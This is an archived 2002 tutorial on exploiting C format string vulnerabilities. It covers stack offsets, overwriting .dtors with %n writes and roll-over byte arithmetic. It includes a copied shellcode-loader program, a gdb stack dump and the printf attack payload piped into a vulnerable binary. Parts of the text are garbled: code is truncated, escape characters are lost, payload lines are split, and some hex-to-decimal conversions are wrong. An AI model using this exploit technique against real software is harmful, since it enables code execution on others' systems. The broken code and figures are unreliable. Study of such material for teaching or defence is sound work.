TUCoPS :: General Information :: formats.txt

Format String Exploitation

When code goes wrong - Format String Exploition
Oct 09 2002
By: DangerDuo

I will try to keep this article as short and as easy to understand as
possible so the average people would understand this concept.

What is Format String?

Formatstring are the %d, %s, %u, %x, %p %n in your C langauge that you
use when using printf and something similar.

How is it vulernable?

Well, if a program did not use a format string to print a certain data
out, It is possible for the user to input formatstring that will gives
us reading on the stack.

Example Vulernable Code

main(int argc,char **argv)
{ char bleh[80];

This program has a char array of 80 but will only accept 79 char.
However, as you see in the printf(), it does not provide a formatstring.
So it is vulernable to a format string exploition.



What to know so I can exploit format string

The Ingredient to exploit format string would include the %u, %x, %n formatstring, gdb,
shellcode, C programming, and understand of the stack. So if we run the program above, we
can do like


it will give is


41 is really 0x41 = A in hex.

So two are a few things we have to do before we can exploit formatstring bug.

#1. Find how many offset it takes to reach our buffer.

It is not the case that our buffer is always right before our input. So what if we take the
code above for example, there is a char blah[80]; after the char bleh[4];? It would take 2
offset to reach our bleh buffer. Usually you do it like AAAA%x%x. We use two %x. But
since we're lazy, we use the $ to help us out. %2$x will directly go to the 2nd %x. So we
don't have to type all these extra %x to reach our buffer.

Things to know

If you don't enter any AAAA, and use %x directly, you'll be reading the stack itself.

#2. What to overwrite?

Usually i am lazy and i would overwrite the .dtor. .dtor is the destructor that tags along any
C program when compiled under gcc. Even if you do not declare a destructor, it'll still get
added during compile time. You can overwrite the EIP just like Buffer-overflow. But I am
lazy to search for the EIP. So i would do .dtor overwrite. For an indept article on .dtor
overwrite, try searching your favorite search engine.

To find the .dtor, I do this:

objdump -h vulernableprogram | grep .dtor

18 .dtors        00000008  080494e8  080494e8  000004e8  2**2

We find that .dtor begins with 0x080494e8

But we want to overwrite .dtor_end which is always 4 bytes after the .dtor_list

.dtor_list = 0x080494e8
.dtor_end = 0x080494ec

So just add 4 bytes and you get the result. The adress 0x080494ec contains 0x00000000.
So we have to change 0x00000000 to an address of our choice. Such as the address of a
shellcode :)

#3 Overwriting the address

Before we begin. Check this:

int x;
printf("AAAA%n", &x);

x would become 4. It is because we use the %n. The %n writes the amount of data that we
display so far but before the %n itself. Since A is a char, they're 1 byte each. so 4 of them
= 4 byte. That is why x becomes 4. So we can do this:

/xec/x94/x04/x08 = 0x080494ec in backward because small endian.

and if we do %n for that, we would have written 0x00000004 at 0x080494ec. It is because
each hex is 1 byte. So 4 hex = 4 bytes. So that is why it is 000000004. I hope you have an
idea of what we're doing :P As you can see, we can just fill the specific address, as in .dtor
with the address of shellcode by adding as many bytes it needs to equal our shellcode's
address. It might be normal if it is small, like the 4 byte. But imagine the address are part
apart. Imagine an address at:


How the hell am i gonna fit that crap into the address. The computer can't take that many
bytes. Before it even reach that much, the computer will cut you off. So i'll be introducing
two method of overwriting the .dtor.

#4 Byte-per-Byte and Two Write

Byte - per - byte method consist of writing 4 address seperately. Each address contains 1
byte of hex. Which will eventually be the address of a shellcode when is put in a pretty
picture. So since we have to write 4 address, it would be from 0x080494ec to 0x08494ef.
Each address is like a pointer to the next byte. So Here is our shellcode that loads up to an
Env Variable call EGG. I rip this from Smashing the Stack for Fun and Profit

------------------------ cut here ----------------------------------
 Rip from the Smashing the stack for fun a profit
 Cause DangerDuo too lazy


#define DEFAULT_OFFSET                  0
#define DEFAULT_BUFFER_SIZE             10512
#define NOP                             0x90

char shellcode[] =

 unsigned long get_sp(void)
   __asm__("movl %esp,%eax");
  main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int i;
  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

 if (!(buff = malloc(bsize)))
    printf("Can't allocate memory.
  addr = get_sp() - offset;

  printf("Using address: 0x%x
", addr);

  ptr = buff;

  addr_ptr = (long *) ptr;

  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '

---------------------------- cut here ------------------------------

If you want to know what this code does, than prefer to Phrack 49 Smashing the stack for
fun and profit. Okay, so that our shellcode is load into an Env, we find its address:

Using address: 0xbffffb9c
bash$ gdb format
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) break *main
Breakpoint 1 at 0x8048444
(gdb) run
Starting program: /home/newbies/newbie15/format
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Breakpoint 1, 0x8048444 in main ()

(gdb) x/200x $ebp

0xbfffd2e8:     0x00000000      0x080483c9      0x08048444      0x00000001
0xbfffd2f8:     0xbfffd314      0x08048308      0x080484ac      0x4000acb0
0xbfffd308:     0xbfffd30c      0x40013950      0x00000001      0xbfffd41b
0xbfffd318:     0x00000000      0xbfffd439      0xbfffd454      0xbfffd489
0xbfffd328:     0xbfffd490      0xbfffd4a4      0xbfffd4c3      0xbfffd4d0
0xbfffd338:     0xbfffd4f4      0xbfffd50d      0xbfffd526      0xbfffd579
0xbfffd348:     0xbfffd581      0xbfffd58f      0xbfffd59a      0xbfffd5b5
0xbfffd358:     0xbfffd5c2      0xbffffed2      0xbffffef0      0xbfffff01
0xbfffd368:     0xbfffff09      0xbfffff17      0xbfffff27      0xbfffff34
0xbfffd378:     0xbfffff45      0xbfffff53      0xbfffff64      0xbfffff73
0xbfffd388:     0xbfffff8f      0x00000000      0x00000003      0x08048034
0xbfffd398:     0x00000004      0x00000020      0x00000005      0x00000006
0xbfffd3a8:     0x00000006      0x00001000      0x00000007      0x40000000
0xbfffd3b8:     0x00000008      0x00000000      0x00000009      0x080483a8
0xbfffd3c8:     0x0000000b      0x000007df      0x0000000c      0x000007df
0xbfffd3d8:     0x0000000d      0x0000006b      0x0000000e      0x0000006b
0xbfffd3e8:     0x00000010      0x008001bf      0x0000000f      0xbfffd416
0xbfffd3f8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffd408:     0x00000000      0x00000000      0x00000000      0x35690000
0xbfffd418:     0x2f003638      0x656d6f68      0x77656e2f      0x73656962
0xbfffd428:     0x77656e2f      0x31656962      0x6f662f35      0x74616d72
0xbfffd438:     0x44575000      0x6f682f3d      0x6e2f656d      0x69627765
0xbfffd448:     0x6e2f7365      0x69627765      0x00353165      0x4f4d4552
0xbfffd458:     0x4f484554      0x613d5453      0x2d6c7364      0x322d3336
0xbfffd468:     0x312d3130      0x342d3938      0x73642e34      0x736c2e6c
0xbfffd478:     0x33306e61      0x6361702e      0x6c6c6562      0x74656e2e
0xbfffd488:     0x3d5a4800      0x00303031      0x54534f48      0x454d414e
0xbfffd498:     0x69616d3d      0x756f736e      0x00656372      0x495a4f4d
0xbfffd4a8:     0x5f414c4c      0x454d4f48      0x73752f3d      0x696c2f72
0xbfffd4b8:     0x656e2f62      0x61637374      0x69006570      0x726f6e67
0xbfffd4c8:     0x666f6565      0x0030313d      0x4f5f534c      0x4f495450
0xbfffd4d8:     0x203d534e      0x6f632d2d      0x3d726f6c      0x6f747561
---Type  to continue, or q  to quit---
0xbfffd4e8:     0x20462d20      0x2d20622d      0x00302054      0x4e45504f
0xbfffd4f8:     0x484e4957      0x3d454d4f      0x7273752f      0x65706f2f
0xbfffd508:     0x6e69776e      0x53454c00      0x45504f53      0x6c7c3d4e
0xbfffd518:     0x70737365      0x2e657069      0x25206873      0x414d0073
0xbfffd528:     0x5441504e      0x752f3d48      0x6c2f7273      0x6c61636f
0xbfffd538:     0x6e616d2f      0x73752f3a      0x616d2f72      0x72702f6e
0xbfffd548:     0x726f6665      0x3a74616d      0x7273752f      0x6e616d2f
0xbfffd558:     0x73752f3a      0x31582f72      0x2f365231      0x3a6e616d
0xbfffd568:     0x7273752f      0x65706f2f      0x6e69776e      0x6e616d2f
0xbfffd578:     0x53454c00      0x4d2d3d53      0x45535500      0x656e3d52
0xbfffd588:     0x65696277      0x4c003531      0x4f435f53      0x53524f4c
0xbfffd598:     0x414d003d      0x59544843      0x693d4550      0x2d363835
0xbfffd5a8:     0x6c2d6370      0x78756e69      0x756e672d      0x5f434c00
0xbfffd5b8:     0x3d4c4c41      0x49534f50      0x47450058      0x90903d47
0xbfffd5c8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffd5d8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffd5e8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffd5f8:     0x90909090      0x90909090      0x90909090      0x90909090

There, we see 0x90909090. So I pull from random that 0xbfffd5f8 will be the address of our
shellcode. Just to make sure that 0xbffffd5f8 contains 0x90909090, i did

(gdb) x/x 0xbfffd5f8
0xbfffd5f8: 0x90909090

Okay, so we'll be using 0xbffffd5f8 since it is the address of a NOP, which eventually will
hit our shellcode. So we dissect the bytes.

0xbf = 191
0xff = 255
0xd5 = 213
0xf8 = 248

Since it is small endian, everything goes backward, we write 0xf8 to 0x080494ec 0xd5 to
0x080494ed 0xff to 0x080494ee 0xbf to 0x080494ef. As we know we can't write it as xf8
well would have to write it as %.243u or %.243x which both = to 243 bytes. Also, as i said
before, %n write the amount of bytes that is before the %n. So We have to minus the byte
we write next after the %n.

So Like we write our 4 address first, that is 16 bytes. We have to 248 bytes first. But since
16 bytes will be written, we have to do 248 - 16 which is 232 bytes. After that, we have to
write d5, which is 213. Here we encounter a problem. Is that 213 is smaller than 248. How
do we go backward?

The answer to that is the "roll-over" method. It is basiclly add an extra 256 bytes to your
orginal byte. So that makes 0xd5 + 256 bytes = 0x1d5. We do that because the 0x1 will
get discarded so we will get d5 and also that the byte is bigger than its orginal before
ending the 256 bytes. So we have to write 469 bytes. But since we have perviously written
248 bytes, we have to subtract it it make things even. 469 - 248 = 221 bytes. So after that
you have to write 225 bytes, so since it is only 0xd5 which is 213, we do 255 - 213 = 42.
So we write 42 bytes. And after that, 191 is smaller than 255. So we do roll over again. 191
+ 256 = 0x1bf. So that is 447 and since written 255 perviously, it is 192 bytes need to
write. And the 0x1 will get discard so we don't have to worry about that.

With that, we can begin to construct our code.

printf "xecx94x04x08xedx94x04x08xeex94x04x08


42u%%3$n%%.192u%%4$n" > file

Yes, that is our attack code. We use two % because if we don't the % will be gone on the
actual code. So %% = %. Also we need the becauuse else we can't use the $ sign for

So we write that amount of bytes for each address using offsets. Just to Refresh your mind.
We want to:

Overwrite 0x080494ec which is the .dtor with 0xbfffd5f8 which is the address of NOP which
is part of our shellcode. So since i store our attack code into a file call file, we can do the

DangerDuo@electric-daisy:~$printf "xecx94x04x08xedx94


%.221u%%2$n%%.42u%%3$n%%.192u%%4$n" > file DangerDuo@electric-daisy:~$ ./egg
Using address: 0xbffffb9c
bash$ ( (cat file ; echo) ; cat ) | fmtbug














Well, that is all to FormatString Bug. But reading is not everything, playing and testing
should help you understand the stuff i done here.

To tell you readers the truth, I am not that good with format String exploition. I only know
the basic and still have some questions.

Question 1:

If the address is 0x0xbffffd20

0xbf = 101
0xff = 255
0xfd = 253
0x20 = 32

We all know that 255 - 253 is 2. So if i were to write two bytes, it should be give 255. But
it turns out it doesn't instead it throws me to some weird hex... If anything can figure out
the correct way to create the 0x0bffffd20 please e-mail me because I have no clue :(

Well, that is it to the article. I hope you guys enjoy it...


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH